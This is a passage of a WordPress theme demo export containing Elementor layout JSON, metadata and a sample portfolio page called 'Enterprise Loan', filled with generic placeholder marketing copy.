2019<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"18475bca","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"9fa30e6","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"44bd3c29","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"4348fe38","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"5fa0d94e","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"5db0d1c","elType":"section","settings":[],"elements":[{"id":"ff1e2a9","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"aab2ac1","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ca50893","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7d56fc3","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"2d83db3","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"d99ff31","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"d8a5625","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"d9f189b","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"b6532f6","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"45a5e05","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2e140bb","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"54335c7","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"07fb8ef","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"162d348","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2baa987","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"e190c9b","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"a24b46d","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"1291a4a","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"9ded705","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"246da55","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"9720705","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #55bb53;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"28cbef3","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"a63d023","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-4.png","id":2064},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"c53d7e9","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[835]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Enterprise Loan</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/enterprise-loan/</link>
		<pubDate>Fri, 11 Sep 2020 07:12:33 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=830</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>January 12, 2018</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-4-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>830</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:12:33]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:12:33]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[enterprise-loan]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="business"><![CDATA[business]]></category>
		<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[831]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[832]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"7adbf0ca","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"14f0c251","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"431e8d5","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"61d4ce9c","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"24904d7d","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"771bc1d8","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"21ed026b","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ca6bc03","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"49ed3d5a","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3fabd3ac","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"17e6f8b0","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"b60571d","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"68f7ccb0","elType":"widget","settings":{"editor":"<p>January 12, 2018<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"2502bf2","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"36dfc991","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"25e1e05c","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"5d14aed4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"6e1392f9","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"4c1374e","elType":"section","settings":[],"elements":[{"id":"47e6f57","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"aadc3d4","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4273795","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"5f8ff76","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"5ed5c88","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"c2081d8","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"795ba5c","elType":"widget","settings":{"editor":"<p>What\u2019s the right path 